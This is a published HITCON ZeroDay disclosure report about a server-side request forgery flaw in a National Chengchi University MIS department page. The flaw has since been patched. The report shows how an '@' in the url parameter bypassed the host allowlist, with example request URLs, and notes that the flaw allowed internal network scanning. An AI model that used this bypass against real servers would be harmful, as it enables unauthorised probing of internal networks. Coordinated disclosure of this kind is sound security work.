國立政治大學資訊管理學系 SSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2024-01385
  •  發信 Vendor: 國立政治大學
  • Title: 國立政治大學資訊管理學系 SSRF
  • Introduction: SSRF

處理狀態

目前狀態

公開
Last Update : 2024/12/25
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2024/10/26 20:41:01 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/26 20:45:50 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/26 22:13:07 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/29 20:57:32 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/29 21:42:16 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/30 06:30:50 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/30 07:45:16 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2024/10/31 12:56:51 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2024/11/08 18:22:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2024/11/08 18:22:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2024/12/17 11:28:51 : 已修補 (由 組織帳號 更新此狀態)
  • 2024/12/17 11:37:25 : 已修補 (由 組織帳號 更新此狀態)
  • 2024/12/25 03:00:17 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2024-01385
  • 通報者:nhd1261 ({{萌新}})
  • 風險:高
  • 類型:Server-Side Request Forgery (SSRF)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://mis2.nccu.edu.tw/annc_url?url=http://[email protected]
https://mis2.nccu.edu.tw/annc_url?url=http://[email protected]

敘述

發現一個功能使用url來指定pdf檔
https://mis2.nccu.edu.tw/annc_url?url=http://aca.nccu.edu.tw/exam/104/104announcement/18Management.pdf

一開始嘗試發現有限制,無法存取外部域名或是使用內網IP來請求內部資源,但經過測試發現可以加上@ 符號 URL 欺騙繞過,將頁面導向google,經測試也能以進行內網掃描,以此來了解內網配置。
Google測試:
https://mis2.nccu.edu.tw/annc_url?url=http://[email protected]

httpbin.org/get測試,可以看出伺服器確實對外發出請求。
https://mis2.nccu.edu.tw/annc_url?url=http://[email protected]/get

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;